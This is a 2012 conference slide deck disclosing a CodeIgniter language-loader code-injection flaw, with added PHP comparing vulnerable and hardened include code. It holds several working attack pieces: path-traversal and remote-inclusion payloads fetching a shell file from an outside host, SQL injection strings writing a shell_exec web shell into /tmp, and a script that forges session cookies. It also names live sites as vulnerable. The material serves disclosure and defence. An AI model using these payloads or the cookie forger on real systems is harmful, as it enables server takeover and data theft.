20 May 2012

CodeIgniter i18n Code Injection

Abbas Naderi (aka AbiusX)
OWASP Chapter Leader of Iran
ISSECO Member
abbas.naderi@owasp.org / me@abiusx.com
Understand the Context
PHP
•   Most-used server-side language (about 75% of sites)
•   17 years of maturity
•   Open-source nature
•   Rapid develop/deploy cycle
•   Secure core
•   Insecure libraries
•   Low-level web development
PHP Frameworks
•   PHP itself offers only low-level web support
•   Frameworks fill that gap
•   Much used and mature -> secure
•   Huge codebase -> insecure
•   Written by developers, not security people
•   Security-oriented frameworks (OWASP ESAPI)
CodeIgniter
• Most used Mid-level Framework
Internationalization
• i18n matters today
• Difficult to implement:
   – File-based (WordPress, eFront, …)
   – Database-based (jFramework)
   – Code-based (CodeIgniter, …)
• Seldom-exercised code paths -> no testing
Remote File Inclusion
RFI at a glance
• 3rd most common vulnerability in the 2007 OWASP Top Ten (A3: Malicious File Execution)
• Not in the 2010 Top Ten: mostly understood and fixed
• Highest impact (run arbitrary code!)
• Common in interpreted languages
• Most common in PHP (why?)
RFI Example
<?php
$page = $_GET['page'];
include "./pages/{$page}.php";   // deliberately vulnerable: $page is used unfiltered

Malicious input (the %00 null byte truncates the path on PHP < 5.3.4, dropping the ".php" suffix):
Mysite.com?page=../../../etc/passwd%00
With the current directory at /var/www this becomes
include "/var/www/pages/../../../etc/passwd";
= include "/etc/passwd"; // the file contents are echoed to the screen
(Strictly this is a local file inclusion through path traversal; the remote variant is on the next slide.)
RFI Cheatsheet

If the application appends a fixed suffix, use a null byte in the input to terminate the string (PHP < 5.3.4 only):
include "./{$page}.you.cant.rfi.me.php";

If the input starts the path, use an absolute path, or a URL when remote inclusion is enabled:
include "{$_GET['page']}";

page=http://abx.ir/shell.txt%00
Requires allow_url_include=On (off by default since it was introduced in PHP 5.2)
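The two include shapes from the cheatsheet beside a hardened replacement, as an added PHP example; this is not code from the slides, and the ./pages directory and the allow-list of page names are assumptions made for illustration.

```php
<?php
// Added example, not from the slides. Shows the two vulnerable include shapes
// from the cheatsheet and a hardened replacement. The ./pages directory and
// the allow-list of page names are assumptions for illustration.

// Shape 1: user input is followed by a fixed suffix. Before PHP 5.3.4 a %00
// in $page truncated the path, so "../../../etc/passwd%00" shed the ".php"
// suffix and the include read /etc/passwd. PHP >= 5.3.4 rejects paths that
// contain a null byte, but plain traversal to another .php file still works.
function page_path_suffix(string $page): string
{
    return "./pages/{$page}.php";
}

// Shape 2: user input starts the path. Absolute local paths work as-is, and
// with allow_url_include=On a URL such as http://attacker.example/shell.txt
// is fetched and executed (the true RFI case).
function page_path_prefix(string $page): string
{
    return $page;
}

// Hardened: accept only names from an allow-list, then verify the resolved
// real path is inside the pages directory. The allow-list alone rejects "..",
// "/", "\0" and stream wrappers; the realpath() check guards the directory
// boundary if the allow-list is ever relaxed to a pattern.
function page_path_hardened(string $page, string $pagesDir): ?string
{
    $allowed = ['home', 'about', 'contact'];      // assumption: published pages
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    $base = realpath($pagesDir);
    $file = realpath($pagesDir . '/' . $page . '.php');
    if ($base === false || $file === false) {
        return null;                               // directory or file missing
    }
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                               // escaped the pages directory
    }
    return $file;
}

// Usage in a request handler:
$page = (string) ($_GET['page'] ?? 'home');
$file = page_path_hardened($page, __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    exit('no such page');
}
include $file;
```

Both vulnerable helpers only build the path so the shapes can be compared; the hardened one is the one to include from. realpath() returns false for a non-existent file and canonicalises ".." segments, which is why the prefix comparison against the pages directory is reliable.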
Filter Parameters

• CodeIgniter has the fewest published exploits of all major PHP frameworks (commercial codebase)
• CodeIgniter rejects dangerous characters such as ', ", /, ?, <, > in GET parameters, which stops most XSS and injection attacks
• CodeIgniter has a central module loader and an MVC pattern, which prevent most RFIs
Internationalization
Internationalization (II)
Local File Inclusion
• Useful for extracting information from the target system:
  – /etc/passwd
  – ./config/database.php (database credentials)
• Easy to exploit
Local Code Inclusion
• Requires a (blind) SQL injection that can write a file:
  – ' and 1=0 union select "<?php echo shell_exec($_REQUEST[q]);" into outfile "/tmp/sales_lang.php" --

  – CodeIgniter filters <? from input, so hex-encode the payload and let MySQL decode it:
  – ' and 1=0 union select unhex("3c3f706870206563686f207368656c6c5f6578656328245f524551554553545b715d29") into outfile "/tmp/common_lang.php" --

  – Caution: INTO OUTFILE refuses to overwrite an existing file, needs the FILE privilege, writes as the mysqld user (hence a world-writable /tmp), and is blocked when secure_file_priv restricts the directory
  – Where to find the blind injection? That is application-specific; the framework only supplies the file-inclusion sink
Local Code Inclusion (II)
• Now change the session cookie. Decoded, it is a serialized PHP array followed by a 32-character hash:
  a:8:{s:10:"session_id";s:32:"aa55f87c8b18afe75b3cd7baba330553";s:10:"ip_address";s:15:"178.162.154.251";s:10:"user_agent";s:50:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:12";s:13:"last_activity";s:10:"1337541932";s:3:"lan";s:1:"1";s:3:"dir";s:3:"rtl";s:4:"lang";s:2:"fa";s:3:"alg";s:5:"right";}b3c9bed5e9656eca61938c9bc6965bad

  On the wire it is URL-encoded:
  a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22aa55f87c8b18afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A%22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A%22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A%22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965bad

• Change the lang entry from
  s:4:"lang";s:2:"fa"
  to
  s:4:"lang";s:18:"../../../../../tmp"
  (the length prefix must match the new value, s:18 here, or unserialize() fails), so the language loader's include path becomes language/../../../../../tmp/<name>_lang.php.
• The trailing hash is md5(data . encryption_key) in CodeIgniter 2.x; with the empty encryption_key that ships in config.php it is just md5(data) and anyone can recompute it.
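The cookie edit above, carried out with PHP's own serialize()/unserialize() so the length prefixes and the trailing hash come out right, as an added example that is not from the slides. It assumes the CodeIgniter 2.x Session library with sess_encrypt_cookie = FALSE (cookie value = serialize($userdata) followed by md5(serialized . encryption_key)) and a blank encryption_key by default; the session contents are a constructed sample shaped like the slide's cookie, not the slide's cookie itself.

```php
<?php
// Added example, not from the slides. Decodes a CodeIgniter 2.x session
// cookie, changes "lang", and re-encodes it with valid serialized lengths.
//
// Assumptions (CodeIgniter 2.x Session library, sess_encrypt_cookie = FALSE):
// the cookie value is serialize($userdata) followed by
// md5($serialized . $encryption_key), and the shipped config.php leaves
// $config['encryption_key'] empty. The session below is a constructed sample
// shaped like the slide's cookie, not the cookie from the slide.

function ci_session_decode(string $rawCookie, string $encryptionKey = ''): ?array
{
    $cookie = urldecode($rawCookie);
    if (strlen($cookie) <= 32) {
        return null;
    }
    $data = substr($cookie, 0, -32);
    $hash = substr($cookie, -32);
    // CI's sess_read() rebuilds the hash the same way and destroys the
    // session on mismatch, so a forged cookie must carry a matching hash.
    if (!hash_equals(md5($data . $encryptionKey), $hash)) {
        return null;
    }
    $session = @unserialize($data, ['allowed_classes' => false]);
    return is_array($session) ? $session : null;
}

function ci_session_encode(array $session, string $encryptionKey = ''): string
{
    $data = serialize($session);      // emits correct s:N: length prefixes
    return urlencode($data . md5($data . $encryptionKey));
}

// Constructed sample session with the slide's keys
$session = [
    'session_id'    => str_repeat('a', 32),
    'ip_address'    => '192.0.2.10',
    'user_agent'    => 'Mozilla/5.0',
    'last_activity' => '1337541932',
    'lan'           => '1',
    'dir'           => 'rtl',
    'lang'          => 'fa',
    'alg'           => 'right',
];
$cookie = ci_session_encode($session);

// Forge the language: the loader will then include
// language/../../../../../tmp/<file>_lang.php. Hand-editing "fa" in place
// while leaving s:2: makes unserialize() fail; serialize() writes s:18:.
$forged = ci_session_decode($cookie);
$forged['lang'] = '../../../../../tmp';
echo urldecode(ci_session_encode($forged)), "\n";

// Decoding as CI would: accepted only when the same key was used to encode.
var_dump(ci_session_decode(ci_session_encode($forged, 'k3y'), 'k3y'));
var_dump(ci_session_decode(ci_session_encode($forged, 'k3y')));
```

The first var_dump shows the forged array (same key on both sides); the second prints NULL because the hash was computed with a key the decoder does not have, which is the entire protection a non-empty encryption_key provides. By default CI 2.x also compares user_agent against the request and expires the session on last_activity, so a forged cookie keeps those fields consistent with the client that sends it.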
Remote Code Inclusion
• Look at the code (CodeIgniter 2.x, system/core/Lang.php, Lang::load()):
     include($package_path.'language/'.$idiom.'/'.$langfile);
  $idiom is the language name handed over by the application and nothing in the loader validates it; $package_path comes from the Loader's package-path list.

• You a hacker? Tell me how!
Remote Code Inclusion (II)
$this->load->add_package_path()
From the CodeIgniter user guide: "Adding a package path instructs the Loader class to prepend a given path for subsequent requests for resources. As an example, the "Foo Bar" application package above has a library named Foo_bar.php. In our controller, we'd do the following:"

$this->load->add_package_path(APPPATH.'third_party/foo_bar/');

http://codeigniter.com/user_guide/libraries/loader.html

Whatever is prepended here becomes the prefix of the include on the previous slide, so a package path that an application derives from untrusted input, or that points at an attacker-writable location, is another route into the same include.
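The language-file lookup from the two slides above, reduced to a standalone function beside a hardened version, as an added PHP example; it is not CodeIgniter's code. $packagePaths stands in for what $this->load->get_package_paths(TRUE) returns, the _lang.php suffix matches what the loader appends to the requested name, and the directory names used are assumptions.

```php
<?php
// Added example, not CodeIgniter's code. The language-file lookup from the
// slide reduced to a standalone function, beside a hardened version.
// $packagePaths stands in for $this->load->get_package_paths(TRUE); the
// directory names used below are assumptions.

// Vulnerable shape: $idiom and $langfile are concatenated unchecked.
// $idiom = "../../../../../tmp" climbs out of every package path, and a
// package path an application derives from untrusted input is used verbatim
// as the prefix of the include.
function lang_file_vulnerable(array $packagePaths, string $idiom, string $langfile): ?string
{
    foreach ($packagePaths as $packagePath) {
        $file = $packagePath . 'language/' . $idiom . '/' . $langfile;
        if (file_exists($file)) {
            return $file;           // the caller include()s this
        }
    }
    return null;
}

// Hardened: the idiom must be a plain token, the file name must be a plain
// token with the _lang.php suffix the loader appends, and the resolved real
// path must stay under <package>/language/. Package paths that are not
// existing local directories are skipped.
function lang_file_hardened(array $packagePaths, string $idiom, string $langfile): ?string
{
    if (!preg_match('/^[a-z][a-z0-9_-]{0,31}\z/i', $idiom)) {
        return null;                // rejects "..", "/", "\0", "http://"
    }
    if (!preg_match('/^[a-z][a-z0-9_]{0,63}_lang\.php\z/i', $langfile)) {
        return null;
    }
    foreach ($packagePaths as $packagePath) {
        $langDir = realpath($packagePath . 'language');
        if ($langDir === false || !is_dir($langDir)) {
            continue;
        }
        $file = realpath($langDir . '/' . $idiom . '/' . $langfile);
        if ($file !== false
            && strncmp($file, $langDir . DIRECTORY_SEPARATOR, strlen($langDir) + 1) === 0) {
            return $file;
        }
    }
    return null;
}

// Usage (paths are assumptions; trailing slashes as CI's APPPATH uses them):
$paths = ['/var/www/application/third_party/foo_bar/', '/var/www/application/', '/var/www/system/'];
var_dump(lang_file_vulnerable($paths, '../../../../../tmp', 'sales_lang.php'));
var_dump(lang_file_hardened($paths, '../../../../../tmp', 'sales_lang.php'));
var_dump(lang_file_hardened($paths, 'english', 'sales_lang.php'));
```

With /tmp/sales_lang.php present, the vulnerable lookup returns the first package path under which language/../../../../../tmp/sales_lang.php resolves to that file, which the caller would then include; the hardened lookup returns NULL for the traversal and a real path only when an existing language/english/sales_lang.php sits under one of the package paths. The realpath() containment check is what makes a malicious package path harmless even if the token checks are later relaxed.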
Demonstration
CodeIgniter + i18n
• More than 240 sites discovered:
  – http://www.sedoparking.com
  – http://bambooinvoice.org/
  – http://www.haughin.com/
  – http://www.rapyd.com/
  – http://code-igniter.ru/


• And tons more…
Questions?
                    Feedback?


Abbas Naderi (aka AbiusX)
OWASP Chapter Leader of Iran
ISSECO Member
abiusx@acm.org / me@abiusx.com
